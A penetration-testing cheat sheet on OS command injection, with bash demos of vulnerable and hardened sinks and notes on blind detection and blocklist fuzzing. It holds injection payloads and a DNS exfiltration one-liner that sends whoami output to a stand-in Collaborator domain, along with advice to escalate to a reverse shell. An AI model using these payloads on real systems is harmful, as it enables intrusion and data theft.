cmd-injection.md

File metadata and controls

144 lines (99 loc) · 4.32 KB

Cmd Injection

Where Would You Find Command Injection

  • In the following places:
    • Text boxes that take user input
    • Hidden URL paths that take input, e.g. /execute/command-name
    • Query string parameters, e.g. /location?parameter=command
    • When injecting through a URL, remember to URL-encode the characters that aren't accepted (; is %3B, | is %7C, & is %26, a space is %20)
  • Hidden ports:
    • Some frameworks open debug ports that accept arbitrary commands

Overview

  • Use command line symbols (separators) within the input to alter the executed command
  • Pay close attention to application functions that are typically implemented by shelling out to an OS command (ping, nslookup, file conversion, backups and the like)
  • Two forms exist: blind command injection, where you do not see the command's output, and non-blind command injection, where the output is returned to you in the response
  • Ensure you use the proper system commands for the target OS:
cat vs type
ping -c vs ping -n #-c sets the packet count on Linux, -n does so on Windows; on Linux -n only means numeric output, and ping without -c never stops, so the request hangs
ls vs dir
  • Try to start with reading a world-readable file (e.g. /etc/passwd on Linux)

Non-Blind CMD Inj.

  • Once you have identified a potential injection point, use command line symbols within the input to alter the executed command:
; | || & && > >>
  • ; runs the next command unconditionally, && runs it only if the intended command succeeded, || only if it failed, | feeds the intended command's output into yours, & backgrounds the intended command, and > / >> redirect output into a file
  • A newline (%0a), $( ) and backticks also work in most shells: the last two substitute your command's output into the intended command's arguments

  • Once you have exploited non-blind cmd injection, escalate to a reverse shell.
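To see what each separator does to the command that actually runs, here is an added example (not from the original notes) in bash. A toy lookup feature that pastes user input into a shell string stands in for the vulnerable application, and a hardened version validates the value and passes it as an argument rather than as shell source. The host is echoed rather than pinged so the script runs offline; the function names and the input strings are constructed for the example.

```bash
#!/bin/bash
# Added example (not from the original notes): how each separator changes the
# command a vulnerable sink runs. The "application" only echoes the host so
# that this runs offline; swap echo for ping to mirror a real feature.

# Vulnerable sink: the raw value is pasted into a shell command string, so any
# separator in it ends the intended command and starts a new one.
vuln_lookup() {
  sh -c "echo resolving $1"
}

# Hardened sink: allow only hostname characters, then hand the value to the
# shell as a positional parameter, never as shell source.
safe_lookup() {
  case "$1" in
    ""|*[!A-Za-z0-9.-]*) echo "rejected: $1" >&2; return 1 ;;
  esac
  sh -c 'echo "resolving $1"' sh "$1"
}

demo() {
  # ;    runs id regardless of the echo result
  # |    pipes the echo output into wc, so the original output is replaced
  # &&   runs id only if the intended command succeeded (echo always does)
  # ||   runs id only if the intended command failed, so it is silent here;
  #      against ping it fires when the supplied host does not resolve
  # $( ) substitutes the output of id into the echo arguments (inline)
  for p in '127.0.0.1; id' '127.0.0.1 | wc -c' '127.0.0.1 && id' \
           '127.0.0.1 || id' '$(id)'; do
    printf '\n--- input: %s\n' "$p"
    vuln_lookup "$p"
  done
  printf '\n--- hardened sink:\n'
  safe_lookup '127.0.0.1; id'   # rejected
  safe_lookup 'example.com'     # resolving example.com
}

demo
```

The `&` separator is left out of the loop only because backgrounding the intended command makes the output order nondeterministic; it injects just as well. The hardened variant shows the two fixes that matter: an allowlist on the value, and `sh -c '... "$1"' sh "$value"` so that the value is data to the shell, not code.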

Blind CMD Injection

Identification

  • Time delays, ICMP and DNS are useful to determine blind cmd injection
google.com; ping -c11 127.0.0.1 #server will hang for roughly 10 seconds (11 packets, one second apart)
  • Can also try to ping your own attacking host instead of 127.0.0.1, however many corporate environments have egress firewalls that block this, so no packets arriving doesn't mean blind cmd injection isn't taking place
  • Use tcpdump on your host to capture the incoming ICMP echo requests.

  • This proves blind cmd injection, escalate to a reverse shell
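The time-delay check from the identification step, as an added example (not from the original notes) in bash. `blind_sink` stands in for a feature that runs the injected command but discards its output, and `is_blind_injectable` compares a benign request with one carrying `; sleep N`; everything runs locally and the function names are constructed for the example.

```bash
#!/bin/bash
# Added example (not from the original notes): detecting blind command
# injection with a time delay when no output comes back. blind_sink stands in
# for a feature whose command output is discarded; everything here is local.

# Blind sink: the same injection flaw, but stdout and stderr are thrown away.
blind_sink() {
  sh -c "echo resolving $1" >/dev/null 2>&1
}

# Run the sink with a payload and print the wall-clock seconds it took.
time_probe() {
  local start end
  start=$(date +%s)
  blind_sink "$1"
  end=$(date +%s)
  echo $((end - start))
}

# Compare a benign request with one that appends "; sleep N". date only has
# one-second resolution, so allow one second of slack, and use N >= 3 so that
# a benign request rounding up to 1 second can never look like an injection.
is_blind_injectable() {
  local delay="$1" base inj
  base=$(time_probe '127.0.0.1')
  inj=$(time_probe "127.0.0.1; sleep $delay")
  [ $((inj - base)) -ge $((delay - 1)) ]
}

if is_blind_injectable 3; then
  echo "time-based blind command injection confirmed"
else
  echo "no measurable delay"
fi
```

Against a real target, replace `blind_sink` with the HTTP request to the vulnerable endpoint (for example a `curl` call) and keep the comparison; always measure the benign baseline first, because a slow application can otherwise look injectable. For the ICMP variant, `tcpdump -ni eth0 icmp` on your host (assuming eth0 is the listening interface) shows the echo requests as they arrive.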

Burp Collaborator

  • Launch Burp, and choose:

Burp --> Burp Collaborator Client
Press --> "Copy to Clipboard" #to copy a randomly generated Collaborator domain name
Execute your cmd injection, using the copied domain as the target of a DNS lookup or HTTP request
  • Press "Poll now" to see if the request came through

  • If the above worked, move down to the Data Exfil section

Data Exfil via DNS and Burp Collaborator

  • Once you have your Burp Collaborator domain, try your command injection
google.com; a=$(whoami|base32|tr -d =); nslookup $a.COLLAB_DOMAIN_NAME.com
  • Base32 is used because its alphabet (A-Z and 2-7) is valid in a DNS label; the = padding is stripped because it is not
  • Press "Poll now" and you should have something returned like this:
O53XOLLEMF2GCCQ.323lijijf90304jklksjru43k23.oastify.com
  • Then type the following in your local terminal to check the length of the first label; base32 input has to be a multiple of 8 characters
echo -n O53XOLLEMF2GCCQ | wc -c
  • If decoding fails with an invalid input error, add = signs until the length is a multiple of 8 (15 characters here, so one =)
echo -n O53XOLLEMF2GCCQ= | base32 -d
#output:
www-data
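The encode and decode steps above, written out as an added example (not from the original notes) in bash. `dns_encode` produces the padding-free base32 that goes into the DNS name and, going beyond the single label used above, splits long output into 63-character labels because that is the DNS label limit; `dns_decode` reverses it, restoring the = padding to a multiple of 8 characters, which is the general rule behind the "add = signs" step; `exfil_payload` builds the injection string for a given Collaborator domain. The function names and the x.oastify.com domain in the usage are constructed for the example; the www-data value is the one shown above.

```bash
#!/bin/bash
# Added example (not from the original notes): DNS-safe encoding of command
# output for exfiltration, and the matching decoder for the Collaborator side.

# Encode stdin as base32 without '=' padding, split into labels of at most 63
# characters (the DNS label limit), joined with dots so it forms a hostname.
dns_encode() {
  base32 -w0 | tr -d '=' | fold -w 63 | paste -sd. -
}

# Build the injection string from the notes for a given Collaborator domain
# (the value is computed on the target, so $(...) and $a stay literal here).
exfil_payload() {
  printf 'google.com; a=$(whoami|base32|tr -d =); nslookup $a.%s\n' "$1"
}

# Reverse: drop the label dots, pad with '=' up to a multiple of 8, decode.
dns_decode() {
  local s pad
  s=$(printf '%s' "$1" | tr -d '.\n')
  pad=$(( (8 - ${#s} % 8) % 8 ))
  { printf '%s' "$s"; printf '%*s' "$pad" '' | tr ' ' '='; } | base32 -d
}

# Local round trip of the exact value from the notes (whoami prints a newline).
printf 'www-data\n' | dns_encode      # O53XOLLEMF2GCCQ
dns_decode 'O53XOLLEMF2GCCQ'          # www-data
exfil_payload 'x.oastify.com'
```

On the target only `base32` and `tr` are needed, as in the one-liner above; `fold` and `paste` are used on the attacker side when you want to exfiltrate more than one label's worth of data (for example `cat /etc/passwd`), and `dns_decode` accepts the multi-label name exactly as Collaborator shows it.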

Bypassing Character Blocklist with ffuf

  • If you see that some special characters are banned, capture a Burp request to the resource you want to test
  • It should be a POST request
  • Identify the parameter it uses to post the data to the server, e.g.
name=;ls
  • Swap out the command injection attempt that is getting blocked in the Burp request with:
name=FUZZ
  • Save the Burp request to a file on your local machine and fuzz the FUZZ position with a special-character wordlist
ffuf -request search.request --request-proto http -w /opt/Seclists/Fuzzing/special-chars.txt
  • You will usually have to ignore the & character, as it is the parameter separator in a form body and the server will treat whatever follows it as another parameter (send it URL-encoded as %26 instead)
  • Now that you have your results back, filter out the most common response size, which is the "character blocked" response
  • -fs 724
  • Sizes can be comma separated, i.e. if you see a lot of 724 and 726 responses saying the character you posted is blocked
  • -fs 724,726
  • Ensure you also use -mc all (match all status codes) so every HTTP status code is shown, and look for 5XX errors
  • Errors triggered by particular characters hint at the injection type:
{ == SSTI
; | & == cmd injection
' " == SQLI